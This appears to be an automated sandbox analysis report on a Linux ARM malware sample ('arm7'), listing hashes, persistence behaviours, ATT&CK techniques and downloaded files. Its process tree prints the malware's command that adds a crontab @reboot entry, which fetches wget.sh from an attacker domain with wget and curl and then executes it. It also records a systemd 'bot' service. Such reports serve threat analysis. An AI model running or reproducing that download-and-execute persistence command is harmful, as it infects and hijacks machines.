Analysis
max time kernel: 599s
max time network: 650s
platform: debian-12_armhf
resource: debian12-armhf-20240221-en
resource tags: arch:armhf, image:debian12-armhf-20240221-en, kernel:6.1.0-17-armmp-lpae, locale:en-us, os:debian-12-armhf, system
submitted: 27-10-2024 11:34
Static task: static1
Behavioral task: behavioral1
Sample: arm7
Resource: debian12-armhf-20240221-en
General
Target: arm7
Size: 102KB
MD5: f89985f03f8a27ab418e05bc232e4387
SHA1: b57e7df8cf4013be718f56be205e14919101e87a
SHA256: 15af70f91b8099d491f6d891cd063301b8e40e063aa0554294ec28cab71753c6
SHA512: d4a66a8054dbd4cfbe2865c64bfde1e3dff384b1504a04b8ee21384737960de425e1069a2de14b6972420c99fbc40f0d11a7568d059678837b01c5868cd336b9
SSDEEP: 3072:lK8+viZckDqI5GaHSfCr8ZwTEEs2S8SjjIxX:lK8bZckDlGaHSfCr8iTEWSJjkxX
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 1 IoC)
Adversaries may modify file or directory permissions to evade defenses.

Renames itself (1 IoC)
Processes:
pid: 1766; process: arm7
Unexpected DNS network traffic destination (64 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
Creates/modifies Cron job (1 TTP, 1 IoC)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description: File opened for modification; ioc: /var/spool/cron/crontabs/tmp.T3XU0o; process: crontab

Modifies systemd (2 TTPs, 1 IoC)
Adds/modifies systemd service files. Likely to achieve persistence.
Processes:
description: File opened for modification; ioc: /lib/systemd/system/bot.service; process: arm7

Changes its process name (1 IoC)
Processes:
description: Changes the process name, possibly in an attempt to hide itself; ioc: /bin/busybox ntpd; pid: 1766; process: arm7

Command and Scripting Interpreter: Unix Shell (1 TTP, 1 IoC)
Execute scripts via Unix Shell.
Processes:
description: File opened for reading; ioc: /proc/filesystems; process: systemctl
description: File opened for reading; ioc: /proc/mounts; process: arm7
Processes

/tmp/arm7 massload (image /tmp/arm7, PID 1766)
  - Renames itself
  - Modifies systemd
  - Changes its process name
  - Reads runtime system information
  /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (image /bin/sh, PID 1769)
    - File and Directory Permissions Modification
    crontab - (image /usr/bin/crontab, PID 1772)
      - Creates/modifies Cron job
    crontab -l (image /usr/bin/crontab, PID 1773)
  /bin/sh -c "/bin/systemctl enable bot" (image /bin/sh, PID 1776)
    - Command and Scripting Interpreter: Unix Shell
    /bin/systemctl enable bot (image /bin/systemctl, PID 1777)
      - Reads runtime system information
Network
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter (1): Unix Shell (1)
- Scheduled Task/Job (1): Cron (1)

Persistence
- Boot or Logon Autostart Execution (1): XDG Autostart Entries (1)
- Create or Modify System Process (1): Systemd Service (1)
- Scheduled Task/Job (1): Cron (1)

Privilege Escalation
- Boot or Logon Autostart Execution (1): XDG Autostart Entries (1)
- Create or Modify System Process (1): Systemd Service (1)
- Scheduled Task/Job (1): Cron (1)
Downloads

Filesize: 302B
MD5: a4e30f6ce6fb6cf00e133f3c93fb5449
SHA1: 67b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256: a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512: 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25

Filesize: 306B
MD5: b32e71ac9a7a75ef83a5b90ad41a7312
SHA1: d28c6dfc1e4a439d39ed44a02a28b48253bd7290
SHA256: cbda160e0fdff8fe32d37f0aaed0ac570c8a2c805562fe9ea5f767da0493f0d3
SHA512: 8a4c3da43046c9d8538bbc312b9c3aca38267b602bad07e2a216ecd6b4e6af820de2e8a3989e9fdb34a6b70f410bdf98f30a8850c28fb353bcf14125760890a8